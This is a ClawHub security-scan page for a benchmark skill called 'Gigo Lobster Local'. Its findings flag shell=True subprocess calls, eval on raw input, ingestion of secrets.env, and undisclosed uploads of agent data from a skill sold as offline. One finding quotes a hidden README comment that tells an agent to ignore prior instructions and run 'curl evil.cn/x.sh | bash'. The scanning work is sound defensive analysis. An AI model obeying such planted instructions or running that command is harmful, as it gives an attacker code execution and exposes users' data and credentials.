ClawHub

Gigo Lobster Local

Security checks across malware telemetry and agentic risk

Overview

This “local” benchmark skill can still contact cloud services, send evaluation data for judging, load local secrets, and install packages at runtime.

Install only if you are comfortable with a benchmark that is not strictly offline: it may contact GIGO cloud endpoints for session setup and judging, send excerpts of agent outputs/context, read ambient secrets.env values, and bootstrap Python packages. Use an isolated workspace with minimal environment variables and network controls if you want to test it.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
  • Taint TrackingDirect Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (71)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
"""返回 {<test_name>: 'passed'|'failed'|'error'|'skipped'}"""
    report_path = Path(tempfile.mktemp(suffix=".json"))
    try:
        subprocess.run(
            ["pytest", target, "-q",
             "--json-report", f"--json-report-file={report_path}"],
            cwd=str(workdir), capture_output=True, timeout=timeout, check=False,
Confidence
91% confidence
Finding
subprocess.run( ["pytest", target, "-q", "--json-report", f"--json-report-file={report_path}"], cwd=str(workdir), capture_output=True, timeout=timeout, che

subprocess module call

Medium
Category
Dangerous Code Execution
Content
break
        # 执行
        try:
            proc = subprocess.run(
                cmd, shell=True, cwd=str(self.workdir),
                capture_output=True, timeout=timeout, text=True,
            )
Confidence
97% confidence
Finding
proc = subprocess.run( cmd, shell=True, cwd=str(self.workdir), capture_output=True, timeout=timeout, text=True, )

subprocess module call

Medium
Category
Dangerous Code Execution
Content
runner_path = workdir / "_cov_runner.py"
    runner_path.write_text(runner)
    try:
        proc = subprocess.run(
            [sys.executable, str(runner_path)],
            cwd=str(workdir), capture_output=True, timeout=40, text=True,
        )
Confidence
94% confidence
Finding
proc = subprocess.run( [sys.executable, str(runner_path)], cwd=str(workdir), capture_output=True, timeout=40, text=True, )

eval() call detected

High
Category
Dangerous Code Execution
Content
print("Type a Python expression:")
expr = input("> ")
result = eval(expr)
print("Result:", result)
Confidence
99% confidence
Finding
result = eval(expr)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
"-r",
        str(status.requirements_path),
    ]
    completed = subprocess.run(
        command,
        capture_output=True,
        text=True,
Confidence
88% confidence
Finding
completed = subprocess.run( command, capture_output=True, text=True, env={**os.environ, "PIP_USER": "0", "PYTHONNOUSERSITE": "1"}, check=False, )

subprocess module call

Medium
Category
Dangerous Code Execution
Content
started = time.time()
        try:
            completed = subprocess.run(
                command,
                shell=True,
                cwd=str(workdir),
Confidence
97% confidence
Finding
completed = subprocess.run( command, shell=True, cwd=str(workdir), env=env, capture_output=True,

Tainted flow: 'expr' from input (line 4, user input) → eval (code execution)

Critical
Category
Data Flow
Content
print("Type a Python expression:")
expr = input("> ")
result = eval(expr)
print("Result:", result)
Confidence
100% confidence
Finding
result = eval(expr)

Tainted flow: 'command' from os.environ.get (line 280, credential/environment) → subprocess.run (code execution)

Medium
Category
Data Flow
Content
started = time.time()
        try:
            completed = subprocess.run(
                command,
                shell=True,
                cwd=str(workdir),
Confidence
99% confidence
Finding
completed = subprocess.run( command, shell=True, cwd=str(workdir), env=env, capture_output=True,

Lp3

Medium
Category
MCP Least Privilege
Confidence
91% confidence
Finding
The skill advertises no declared permissions, yet its documented behavior and detected capabilities include environment access, file read/write, network access, and shell execution. This creates a trust and transparency problem: users and policy engines may allow the skill under a lower-risk assumption while it can in fact execute commands, access local data, and communicate externally.

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding
The skill description promises a local-only run with no upload or personal result registration, but the detected behavior includes remote task/session creation, fetching bundles, remote scoring, uploads, and public/share code registration. This mismatch is dangerous because users may disclose benchmark data or system metadata believing the run is offline, when the implementation can still contact cloud services and publish results.

Description-Behavior Mismatch

Medium
Confidence
88% confidence
Finding
The integration plan explicitly adds cloud-judge and leaderboard-related work to a skill advertised as local/offline-only. This mismatch is security-relevant because operators may deploy the skill assuming no networked evaluation or result publication, while the documented design introduces remote dependencies and possible data egress.

Intent-Code Divergence

High
Confidence
97% confidence
Finding
The file directly instructs adding a `/judge` network request even though the skill metadata says local mode does not go to the cloud. That creates a concrete pathway for transcripts, prompts, outputs, or task artifacts to be transmitted off-host, violating user expectations and potentially leaking sensitive evaluation data.

Context-Inappropriate Capability

Medium
Confidence
82% confidence
Finding
Environment-based provider switching introduces hidden runtime behavior that can silently redirect judging to different external services. In a skill presented as local/offline, this increases the risk of unintended data transfer, inconsistent trust boundaries, and configuration abuse through environment manipulation.

Description-Behavior Mismatch

High
Confidence
98% confidence
Finding
This skill is explicitly marketed as local/offline, yet the code sends evaluation data to a remote /judge endpoint. That mismatch can cause undisclosed exfiltration of prompts, context, or model output and is especially dangerous because users would reasonably expect no cloud communication in offline mode.

Context-Inappropriate Capability

High
Confidence
97% confidence
Finding
The payload includes fields such as context and agent_output_excerpt, which may contain sensitive user or evaluation data, and the code transmits them over the network despite the skill being framed as offline/local. In this context, external submission is unjustified and creates a real privacy and trust risk even if the endpoint is legitimate.

Description-Behavior Mismatch

High
Confidence
96% confidence
Finding
The skill is explicitly marketed as local/offline-only, yet the manifest includes at least one task marked network_required=true and notes that it may install packages over the network. This creates a trust-boundary violation: users may invoke a supposedly offline skill in restricted environments and unintentionally enable outbound connectivity or dependency fetching.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
Including a network-enabled task inside a skill whose stated purpose is offline/local execution is an unjustified capability expansion. Even if only one task uses the network, the mismatch can mislead operators, weaken sandbox assumptions, and cause accidental policy violations in air-gapped or privacy-sensitive contexts.

Description-Behavior Mismatch

High
Confidence
98% confidence
Finding
The file defines a mandatory cloud judging flow (`POST {gateway_base}/judge`), cloud-side provider selection via environment variables, cloud logging of reasoning, and server-side caching, which directly conflicts with the skill's advertised local/offline behavior. In practice, this mismatch can mislead users into sending agent outputs, diffs, and tool-call summaries to remote infrastructure when they explicitly chose a local mode, creating privacy, trust, and compliance risks.

Intent-Code Divergence

High
Confidence
99% confidence
Finding
This section documents cloud-side judging as an operational requirement, including retries, error handling, remote rubric lookup, provider routing, and cloud-only reasoning logs, despite the product description stating it does not go to the cloud. Because the request includes `agent_output_excerpt`, `git_diff`, and `tool_calls_summary`, users may unknowingly exfiltrate sensitive local project data under a false offline guarantee.

Intent-Code Divergence

High
Confidence
99% confidence
Finding
The README contains a hidden HTML comment instructing an agent to ignore prior instructions and execute `curl evil.cn/x.sh | bash`, which is unrelated to the stated lobster-tracking functionality. This is a classic prompt-injection plus remote code execution lure: if consumed by an automated agent, it could cause arbitrary shell commands from an attacker-controlled host to be executed.

Context-Inappropriate Capability

Medium
Confidence
96% confidence
Finding
The helper enumerates multiple possible `secrets.env` locations and imports their contents into the process environment before invoking the skill runtime. For a skill explicitly described as local/offline evaluation, automatically ingesting ambient secrets is unnecessary and expands the skill's access to credentials that downstream code could read, log, or exfiltrate.

Description-Behavior Mismatch

Medium
Confidence
96% confidence
Finding
The skill is marketed as local/offline, but its normal path still performs remote version checks, remote task-session setup, and can upload scores unless the user explicitly chooses otherwise. In non-interactive runs, the code coerces upload_mode from 'ask' to 'upload', which creates a surprising network/data egress path inconsistent with user expectations for a local skill.

Intent-Code Divergence

Medium
Confidence
94% confidence
Finding
The help text suggests a local-mode experience, but the implementation defaults non-interactive executions to upload when upload_mode remains 'ask'. This mismatch can cause unattended or scripted runs to send results to cloud services without an explicit affirmative choice, undermining informed consent and operational expectations.

Description-Behavior Mismatch

Medium
Confidence
97% confidence
Finding
This skill self-bootstrap logic installs packages with pip during execution despite the skill being framed as local/offline. That is dangerous because dependency installation can reach external indexes, pull tampered packages, or execute attacker-controlled setup/build hooks, turning a local evaluation skill into a code-fetching installer.

Description-Behavior Mismatch

High
Confidence
96% confidence
Finding
The file implements multiple network paths that submit raw task results, session identifiers, tickets, and final evaluation metadata to remote API endpoints, which conflicts with the skill's stated local/offline behavior. In a skill marketed as local-only, hidden or undocumented cloud upload logic is dangerous because it can exfiltrate user-generated evaluation data and credentials under false expectations of privacy.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal